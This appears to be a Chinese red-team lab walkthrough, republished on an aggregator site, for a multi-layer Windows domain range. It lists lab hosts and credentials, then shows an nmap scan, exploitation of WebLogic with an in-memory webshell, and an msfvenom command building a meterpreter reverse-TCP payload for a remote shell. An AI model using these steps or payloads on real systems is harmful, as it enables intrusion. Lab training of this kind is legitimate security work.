本次多层网络域渗透项目旨在模拟渗透测试人员在授权的情况下对目标进行渗透测试, 从外网打点到内网横向渗透, 最终获取整个内网权限的过程.
靶场下载地址:
https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ提取码: vbi2
靶场网络拓扑图为:
文章插图
各靶机信息:
域控: windows Server 2008 + IIS + Exchange 2013 邮件服务目录还原密码: <a href=https://www.isolves.com/it/aq/hk/2022-08-06/"https://xz.aliyun.com/cdn-cgi/l/email-protection" data-cfemail="04766160706165692544">[email protected]#45主机名: owa域管理员: administrator:Admin12345!域内服务器Mssql: Windows Server 2008 + SQL Server 2008 (被配置了非约束委派)主机名: sqlserver-2008本地管理员:Administrator:Admin12345域账户: redteamsqlserver:Server12345 (被配置了约束委派)Mssql: sa:sa域内个人PC: Windows 7主机名: work-7本地管理员:john: [email protected]#45域账户: redteamsaul:[email protected]#45单机服务器: Windows server r2 + weblogic主机名: weblogic本地管理员:Administrator:Admin12345weblogic : weblogic: weblogic123(访问 http://ip:7001)weblogic 安装目录: C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain(手动运行下 startWebLogic.cmd)其他域用户: 域服务账户: redteamsqlserver:Server12345 (被配置了约束委派)邮件用户: redteammail:[email protected]#45加域账户: redteamadduser:Add12345redteamsaulgoodman:Saul12345 (被配置了非约束委派)redteamgu:Gu12345redteamapt404:Apt12345
开启 Windows Server 2012 R2 后, 在 C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain 目录下双击 startWebLogic.cmd 启动 weblogic .单机服务器假定我们已经拿到了靶标 IP : 192.168.10.22 . 利用 Nmap 对靶标进行简易地扫描: nmap.exe -p1-65535 -Pn -A -T4 192.168.10.22 .
文章插图
根据扫描结果发现 7001 端口存在 Oracle WebLogic , 扫一梭子看看有没有漏洞, 从扫描结果来看还是存在挺多漏洞的.
文章插图
直接上工具开发, 发现是 administrator 的权限, 直接注入内存码, 冰蝎上线.
文章插图
文章插图
域内个人 PC当拿下 DMZ 区域的机器后, 除了权限维持和权限提升, 对于横向渗透通常分以下两个方面:
- 判断机器是否为多网卡机器, 然后扫描其他网段, 来发现更多存在漏洞的机器;
- 尽量收集机器上面的敏感信息, 比如敏感内部文件、账号密码本等, 帮助后面快速突破防线.
文章插图
利用 msfvenom 生成一个 payload : msfvenom.bat -p
windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.9 LPORT=7777 -f exe > shell.exe , 上传到靶机后, MSF 上线.
推荐阅读
- 高速|女子打不到车雇电动车上高速:2人轮流骑 又累又热
- 袁泉|袁泉,终于从神坛上 下来了
- Java|Java:2022年招聘Java开发人员指南
- TikTok 乱拳打死老师傅:硅谷大厂还在发论文,它产品已经上线了
- 教师|农村学校招代课教师,招聘内容提到的“待遇从优”,到底有多优?
- 孩子打架家长正确处理
- 膝盖脂肪瘤应该怎么治疗?
- 孕12周双顶径看男女
- 汽车|上海修车店一天收20多辆“中暑”车:爆胎、打火机炸了玻璃
- 二十不惑2|《二十不惑2》:四姐妹职场打拼,传达正向价值观不如《少年派2》